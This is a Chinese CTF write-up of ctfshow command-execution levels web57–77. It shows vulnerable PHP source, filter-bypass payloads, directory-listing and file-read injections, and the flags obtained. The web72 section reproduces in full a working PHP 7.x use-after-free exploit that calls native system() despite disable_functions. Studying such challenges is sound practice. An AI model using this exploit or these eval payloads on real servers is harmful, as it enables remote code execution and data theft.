highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

把字母和数字都过滤了,还是采用临时文件上传漏洞

HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 05 Jul 2025 12:28:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.11
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization,x-auth-token,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Max-Age: 1728000
Content-Length: 278

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as returned in the response above; the value is specific to that challenge instance
$flag="ctfshow{f3529264-fef3-4cfd-a23f-5e393e66a3be}";

得到flag

web57

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// Can you still show off?
//flag in 36.php
// web57: the GET value is spliced between a fixed "cat " and ".php"; letters, digits
// and most punctuation are rejected, but '$', '(' and ')' and '~' are not.
if(isset($_GET['c'])){
$c=$_GET['c'];
// NOTE(review): "$((...))" arithmetic expansion is plain shell syntax built from
// the surviving characters, so the denylist does not stop a numeric value being formed.
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

很贴心的告诉说flag在36.php,

system()里还给加了cat和.php,意思就是说让我们传一个c=36进去,但数字和字母都被禁用了,小数点也不能用,那就用$,(,),~构造出一个36

最后得到payload

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

在源代码里找到了flag

ctfshow{c2e0ce65-2ce8-4f98-857a-84e3e283f3e9}

web58

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Showing off, are you?
// web58: a POST value goes straight to eval() with no visible filter at all.
if(isset($_POST['c'])){
$c= $_POST['c'];
// NOTE(review): the restriction in this and the following levels is evidently
// disable_functions (see the "has been disabled for security reasons" warnings under
// web66/web68), which limits which built-ins may be called but does not constrain
// the logic eval() executes.
eval($c);
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

从这开始,就变成post传参,过滤未知,第一题应该不难,

首先扫一下目录

c=print_r(scandir("/"));
Array ( [0] => . [1] => .. [2] => .dockerenv [3] => bin [4] => dev [5] => etc [6] => home [7] => lib [8] => media [9] => mnt [10] => opt [11] => proc [12] => root [13] => run [14] => sbin [15] => srv [16] => sys [17] => tmp [18] => usr [19] => var )
c=print_r(scandir("."));
Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

发现了flag.php

读一下

c=show_source("flag.php");

得到flag

ctfshow{e096b4bc-0826-44e0-b101-1fb162547b16}

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{a5d88224-d570-4062-a1a4-e46e1d275112}";

还是show_source,能用就一直梭

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{203e5e58-5d97-4b43-8cd0-1660cb486a59}";

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{fa868657-0163-4778-be4c-835e230eff14}";

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{b5f749b6-3bcf-417c-8d8f-53c103474a90}";

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{84d32eaf-9e32-4473-91b2-7f66586e7783}";

web64

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{61c74961-28b3-4b2a-8e49-8c9e1c00702d}";

web65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-07 19:40:53
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


// flag.php as read with show_source(); the value is specific to that challenge instance
$flag="ctfshow{fb109fb6-b936-48dd-9fce-ffe57ca22afa}";

web66


Warning: show_source() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1

好好好,梭的这么多,终于不能用了,

试一下readfile,好好好,也不能用

还是先扫一下吧

c=print_r(scandir("."));
Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

还是在flag.php的,我们试一下别的方法读取

试一下highlight_file

$flag="秀秀得了,这次不在这里";

6

再看看目录吧

c=print_r(scandir("/"));

有个flag.txt

读一下

ctfshow{709406c7-988b-4659-b38b-a7fef725bb22}

web67

用上一题一样能读出来

ctfshow{22fcdb01-0a07-4668-b20d-21fc0fe6480f}

web68


Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

上来就说highlight_file不给用,但毕竟放在flag.txt里

include就读出来了

c=include("flag.txt");
ctfshow{1e369e41-0b48-4b6d-832f-d8abe26ad96f}

web69

ctfshow{851b7aef-a568-41b7-9507-eadc62f68d57}

web70

ctfshow{e72faa3b-1330-4b97-bb61-ad73f970fc21}

web71

先扫盘

???????: ?????_?????????() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? ???????: ???_???() ??? ???? ???????? ??? ???????? ??????? ?? /???/???/????/?????.??? ?? ???? ?? [".","..","????.???","?????.???"] 你要上天吗?

看一下源代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// web71: eval() of a POST value whose buffered output is masked before being sent.
error_reporting(0); // hide diagnostics
ini_set('display_errors', 0); // and make sure none are displayed
// Showing off, are you?
if(isset($_POST['c'])){
$c= $_POST['c'];
eval($c);
$s = ob_get_contents(); // assumes output buffering is active — presumably enabled in php.ini
ob_end_clean();
// NOTE(review): masking runs only if control returns here; evaluated code that exits
// first (as the write-up notes) leaves the buffer unmasked. Output filtering after
// arbitrary code execution is not a control.
echo preg_replace("/[0-9]|[a-z]/i","?",$s); // every letter/digit becomes '?'
}else{
highlight_file(__FILE__); // show this file's source when no parameter is supplied
}

?>

你要上天吗?

大概是说,有个清空输出缓冲的过程,我们需要在eval后就结束,可以在结尾加一个exit();

构造payload

c=echo json_encode(scandir("."));exit();
c=echo json_encode(scandir("/"));exit();

拿到flag

c=include('/flag.txt');exit();

web72

扫盘时发现"/"被禁用,用一下glob伪协议

构造payload

?c=echo json_encode(scandir("glob:///*"));exit();

扫出了flag0.txt

include也无法包含"/",就考虑一下脚本了

c=function ctfshow($cmd) { global $abc, $helper, $backtrace;
// NOTE(review): this is a memory-corruption PoC against the interpreter itself. It does
// not call any disabled built-in, so the function-disable mechanism that blocked
// show_source()/highlight_file() in web66/web68 cannot stop it; the offsets below are
// specific to a 7.x heap layout. The only defence is a patched PHP build and never
// executing attacker-supplied code — function denylists are not a boundary.
// Indentation was lost in the paste; nesting is left as transcribed.

// Destructor snapshots the call stack (with arguments) right after unset()ting $this->a.
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace(); // fallback when the exception trace carries no args
}
}
}

// Plain object with four slots; $b later holds the closure that is finally called with $cmd.
class Helper {
public $a, $b, $c, $d;
}

// Read $s bytes of $str at offset $p as a little-endian integer.
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}

// Inverse of str2ptr: the low $m bytes of $ptr, little-endian. Not called anywhere in this PoC.
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}

// Overwrite $n bytes of $str at offset $p with the low bytes of $v, little-endian.
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}

// Read primitive: after the main body has made $abc overlap $helper->a, the pointer
// written at $abc+0x68 decides what strlen($helper->a) reads back; $s < 8 masks to $s bytes.
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}

// Walk the ELF program headers at $base and return [data segment address, text size, data size]:
// p_type 1 is PT_LOAD; p_flags 6 (RW) is taken as data, 5 (RX) as text; e_type 2 means a
// non-PIE executable whose p_vaddr is already absolute.
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);

$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);

for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);

if($p_type == 1 && $p_flags == 6) {

$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}

if(!$data_addr || !$text_size || !$data_size)
return false;

return [$data_addr, $text_size, $data_size];
}

// Scan the data segment for the built-in function table: an entry whose name string is
// "constant" followed four entries later by "bin2hex" (the two constants are those names
// read little-endian). Returns the address of that entry, or null if nothing matched.
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);

if($deref != 0x746e6174736e6f63)
continue;
} else continue;

$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);

if($deref != 0x786568326e6962)
continue;
} else continue;

return $data_addr + $i * 8;
}
}

// Page-align the leaked address and step back one page at a time until the 7-byte
// ELF magic "\x7fELF\x02\x01\x01" is found; gives up (returns null) after 0x1000 pages.
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}

// Walk 0x20-byte table entries from $basic_funcs until the 6-byte name equals "system";
// return the 8-byte field that follows the name pointer, or false at the table's end.
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);

if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}

// Replaces its own argument with a fresh 79-byte string and hands it to a Vuln whose
// destructor records the backtrace; the use-after-free the PoC relies on is presumably
// triggered by this reassignment interacting with the captured argument.
function trigger_uaf($arg) {

$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}

if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}

// Ten same-sized allocations up front, presumably to shape the heap before the free.
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

trigger_uaf('x');
$abc = $backtrace[1]['args'][0]; // the string captured by Vuln::__destruct

$helper = new Helper;
$helper->b = function ($x) { };

// 79 = the string is still intact, 0 = nothing captured: either way the overlap did not happen.
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}

// Bootstrap: read two pointers out of the overlapped chunk and derive $abc's own address.
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;

// Fix up header fields of the overlapped object; offsets are layout-specific.
write($abc, 0x60, 2);
write($abc, 0x70, 6);

write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);

$closure_obj = str2ptr($abc, 0x20);

// Locate the binary, its data segment, the built-in function table, then zif_system.
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}

if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}

if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}

if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}


// Copy 0x110 bytes of the closure object into $abc at 0xd0, point the slot at 0x20 at
// that copy, and patch two fields of the copy (the second with zif_system), so that the
// call below runs the native system() with $cmd.
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}

write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);

($helper->b)($cmd);
exit();
}

ctfshow("cat /flag0.txt");ob_end_flush(); ?>

很长的一串,我也看不懂,反正打进去就对了()

web73

比上题简单一点,能用以前的方法接着做

web74

换一下函数,不能用scandir了,用glob读

构造payload

c=echo json_encode(glob("*"));exit();
c=echo json_encode(glob("/*"));exit();

扫出来有flagx.txt

用include能读出来

web75-77

太玄学了这几题,大体就是说用sql语句,弱密码去读服务器里的flag文件